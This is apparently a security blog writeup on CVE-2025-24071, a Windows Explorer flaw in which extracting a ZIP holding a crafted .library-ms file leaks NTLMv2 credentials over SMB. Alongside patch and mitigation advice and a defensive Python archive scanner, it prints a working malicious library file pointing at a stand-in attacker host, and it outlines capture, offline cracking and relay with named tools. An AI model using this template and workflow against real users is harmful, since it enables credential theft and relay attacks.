17/12/25

CVE-2025-24071, File Explorer vulnerability expose the NTLM Hashes

Security Research: Windows File Explorer NTLM Hash Exposure

In the name of Allah, the Most Gracious, the Most Merciful.

Overview

CVE-2025-24071 is a spoofing vulnerability in Windows File Explorer that leads to the disclosure of NTLM authentication material. When a user extracts a specially crafted .zip archive containing a malicious .library-ms file, Windows Explorer parses the file as soon as it lands in the extraction folder and opens an SMB connection to an attacker-controlled server. Windows answers that server's NTLM challenge with the logged-on user's NTLMv2 response (loosely called the "NTLM hash"), so the credential material leaks without the victim ever opening the file.

Technical Deep Dive

The vulnerability abuses Windows Library files (.library-ms): XML documents that define a virtual folder aggregating content from one or more locations (the built-in Documents and Pictures libraries are defined this way). Explorer parses a library file as soon as it appears in a folder being displayed, so the user never has to open it, which makes the format an ideal vector for forcing outbound NTLM authentication.

How .library-ms Files Work:

A library file uses an XML structure to list the locations it aggregates. Each location can be a local path or a UNC (Universal Naming Convention) path such as \\server\share. When Explorer processes a library whose location is a UNC path on a remote SMB server, it connects to that server to resolve the location, and the Windows SMB client transparently authenticates with the logged-on user's credentials. With NTLM that means the client sends an NTLMv2 challenge-response computed from the user's NT hash: the password and the NT hash themselves never leave the machine, but the response can be cracked offline or relayed.

Malicious .library-ms File Structure:

malicious.library-ms:

    <?xml version="1.0" encoding="UTF-8"?>
    <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
      <name>@windows.storage.dll,-34582</name>
      <version>6</version>
      <isLibraryPinned>true</isLibraryPinned>
      <iconReference>imageres.dll,-1003</iconReference>
      <templateInfo>
        <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
      </templateInfo>
      <searchConnectorDescriptionList>
        <searchConnectorDescription>
          <isDefaultSaveLocation>true</isDefaultSaveLocation>
          <isSupported>false</isSupported>
          <simpleLocation>
            <url>\\ATTACKER_IP\share</url>
          </simpleLocation>
        </searchConnectorDescription>
      </searchConnectorDescriptionList>
    </libraryDescription>

The critical element is the <url> tag pointing to a UNC path (\\ATTACKER_IP\share). The remaining elements mirror a standard Windows library definition (name string resource, folder-type GUID, icon) so that Explorer accepts the file. When Windows Explorer processes it, it initiates an SMB connection to resolve the location, and that connection triggers NTLM authentication.
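As an added example (not code from the original writeup), here is a small Python scanner that does what a mail gateway or sandbox would need to do with such an archive: open the ZIP without extracting it, parse every .library-ms member using the library XML namespace, and report any <url> that would make Explorer reach out to a remote SMB host. The sample archive, the host names and the function names are constructed for the example; \\ATTACKER_IP\share is the placeholder from the file above. It also handles the longer \\?\UNC\host\share form and file://host/share URLs, which Windows resolves over SMB just the same.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

LIB_NS = '{http://schemas.microsoft.com/windows/2009/library}'
# \\host\share, \\?\UNC\host\share and file://host/share all resolve over SMB.
UNC_RE = re.compile(r'^\\\\(?:\?\\UNC\\)?([^\\/?]+)(?:[\\/]|$)', re.IGNORECASE)
URL_RE = re.compile(r'^file://([^/]+)/', re.IGNORECASE)
LOCAL = {'localhost', '127.0.0.1', '::1'}


def remote_host(location: str):
    """Return the host a library location would make Explorer authenticate to, or None if local."""
    m = UNC_RE.match(location) or URL_RE.match(location)
    if not m:
        return None
    host = m.group(1)
    return None if host.lower() in LOCAL else host


def library_remote_hosts(xml_bytes: bytes):
    """Parse a .library-ms document and list every remote host referenced by a <url> element."""
    # The input is attacker-controlled: use defusedxml instead of ElementTree in production.
    root = ET.fromstring(xml_bytes)
    hosts = []
    for url in root.iter(LIB_NS + 'url'):
        host = remote_host((url.text or '').strip())
        if host:
            hosts.append(host)
    return hosts


def scan_archive(zip_bytes: bytes):
    """List (member, host) pairs for every .library-ms in a ZIP that points at a remote share."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith('.library-ms'):
                continue
            try:
                hosts = library_remote_hosts(zf.read(info))
            except ET.ParseError:
                findings.append((info.filename, 'unparseable'))  # malformed, still worth a look
                continue
            findings.extend((info.filename, h) for h in hosts)
    return findings


def _library(url: str) -> bytes:
    """Minimal library document with a single location (constructed for the example)."""
    return f'''<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>{url}</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>'''.encode()


def build_sample_zip() -> bytes:
    """Constructed test archive: one malicious library, one benign local one, one in long UNC form."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        zf.writestr('evil.library-ms', _library(r'\\ATTACKER_IP\share'))
        zf.writestr('docs.library-ms', _library(r'C:\Users\Public\Documents'))
        zf.writestr('nested/long.library-ms', _library(r'\\?\UNC\10.0.0.5\c$'))
        zf.writestr('readme.txt', b'nothing to see here')
    return buf.getvalue()


if __name__ == '__main__':
    for member, host in scan_archive(build_sample_zip()):
        print(f'{member}: remote location -> {host}')
```

Scanning the archive before extraction matters because the bug fires on extraction itself; a library that only lists local paths is benign, so the scanner keys on the destination host rather than on the file extension alone.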

Why No User Interaction is Required:

Unlike traditional phishing, which needs the user to click a link or open a document, this vulnerability is triggered simply by extracting the archive and viewing the extraction folder in Windows Explorer. The moment the .library-ms file is written into a folder Explorer is displaying, Explorer parses it to render the library and resolves its locations in the background. The user never opens the file, so after extraction it behaves as a zero-click vulnerability from the victim's perspective.

NTLM Hash Capture Process:

When the victim's machine connects to the attacker's SMB server, the two sides negotiate NTLM: the server sends an 8-byte challenge and the client replies with an NTLMv2 response (NTProofStr plus the client blob) computed from the user's NT hash. The attacker's server only has to record the challenge and the response; that pair is all hashcat (mode 5600) or John the Ripper need for an offline dictionary attack. Any rogue SMB server works, and common choices are:

  • Responder: A popular LLMNR, NBT-NS and MDNS poisoner with built-in SMB server
  • Impacket's smbserver.py: Lightweight SMB server for hash capture
  • Metasploit's auxiliary/server/capture/smb: SMB authentication capture module

References & Source Code:

⚠️ Security Note: Microsoft patched this vulnerability in the March 2025 security update. Always ensure your Windows systems are up to date with the latest security patches. The information provided here is for educational purposes only.

Affected Versions

  • Windows 10 Version 1809 for x64-based Systems
  • Windows 10 Version 1809 for 32-bit Systems
  • Windows Server 2025 (Server Core installation)
  • Windows Server 2025
  • Windows Server 2012 R2 (Server Core installation)
  • Windows Server 2012 R2
  • Windows Server 2016 (Server Core installation)
  • Windows Server 2016
  • Windows 10 Version 1607 for x64-based Systems
  • Windows 10 Version 1607 for 32-bit Systems
  • Windows 10 for x64-based Systems
  • Windows 10 for 32-bit Systems
  • Windows 11 Version 24H2 for x64-based Systems
  • Windows 11 Version 24H2 for ARM64-based Systems
  • Windows Server 2022, 23H2 Edition (Server Core installation)
  • Windows 11 Version 23H2 for x64-based Systems
  • Windows 11 Version 23H2 for ARM64-based Systems
  • Windows 10 Version 22H2 for 32-bit Systems
  • Windows 10 Version 22H2 for ARM64-based Systems
  • Windows 10 Version 22H2 for x64-based Systems
  • Windows 11 Version 22H2 for x64-based Systems
  • Windows 11 Version 22H2 for ARM64-based Systems
  • Windows 10 Version 21H2 for x64-based Systems
  • Windows 10 Version 21H2 for ARM64-based Systems
  • Windows 10 Version 21H2 for 32-bit Systems
  • Windows Server 2022 (Server Core installation)
  • Windows Server 2022
  • Windows Server 2019 (Server Core installation)
  • Windows Server 2019

Exploitation Flow

  1. The attacker creates a malicious .library-ms file whose <url> element points to their SMB server
  2. The attacker packages the file into a .zip archive and delivers it (e-mail attachment, download link, shared drive)
  3. The victim extracts the archive on a Windows machine
  4. Windows Explorer automatically parses the .library-ms file and tries to resolve its UNC location over SMB
  5. The victim's SMB client authenticates to the attacker's server with NTLM, sending the user's NTLMv2 challenge-response
  6. The attacker captures the challenge/response pair with Responder or impacket-smbserver and either cracks it offline (hashcat mode 5600) or relays it with ntlmrelayx to a server that does not enforce SMB signing

PoC

Exploitation Demo:

NTLM Hash Capture Demonstration

Mitigation

  • Apply the Microsoft security update for CVE-2025-24071 (March 2025)
  • Block outbound SMB (TCP 445 and 139) at the perimeter firewall so workstations cannot reach SMB servers on the Internet; note that this does not stop an attacker who already has a foothold on the internal network
  • Disable NTLM where possible: set the policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to Deny all (run it in Audit all first and review the Microsoft-Windows-NTLM/Operational log) and prefer Kerberos
  • Require SMB signing and Extended Protection for Authentication on servers; this blocks relay of the captured response but not offline cracking, so enforce long passphrases as well
  • Educate users about the risks of extracting untrusted archives, and have the mail gateway block or quarantine archives containing .library-ms files, which legitimate correspondence almost never includes

That's it for this writeup, hope you enjoyed it and learned something new. See you in the next one!